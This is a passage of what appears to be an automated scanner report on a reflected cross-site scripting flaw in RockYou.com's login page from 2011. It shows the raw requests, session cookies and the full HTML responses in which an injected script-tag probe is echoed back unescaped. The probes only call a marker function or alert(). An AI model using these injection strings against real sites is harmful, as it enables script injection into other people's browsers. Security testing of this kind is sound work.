[0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000B9F)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><..
Date: Mon, 18 Apr 2011 22:04:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:04:02 GMT; path=/; domain=.rockyou.com,lastlogin=1303164243; expires=Wed, 27-Jul-2011 22:04:03 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:04:03 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:04:03 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:04:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=88813 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9125
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000B9F)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| birthyear | GET | 3 |
| country | GET | 0 |
| flixster | GET | 3 |
| mode | GET | create |
| pass | GET | 3 |
| postalcode | GET | 3 |
| sex | GET | 3 |
| source | GET | 3 |
| toscheck | GET | 1 |
| user | GET | 3 |
| user | POST | '"--></style></script><script>alert(0x000BD2)</script> |
| mode | POST | login |
| pass | POST | 3 |
Request
POST /login.php?birthyear=3&country=0&flixster=3&mode=create&pass=3&postalcode=3&sex=3&source=3&toscheck=1&user=3 HTTP/1.1
Referer: http://www.rockyou.com/login.php?birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164258; ctid=1; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BD2)%3c%2fscript%3e&mode=login&pass=3
Referer: http://www.rockyou.com/login.php?birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164258; ctid=1; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BD2)%3c%2fscript%3e&mode=login&pass=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:04:20 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:04:20 GMT; path=/; domain=.rockyou.com,lastlogin=1303164260; expires=Wed, 27-Jul-2011 22:04:20 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:04:20 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:04:20 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:04:20 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=98624 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9120
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x000BD2)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x000BD2)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option 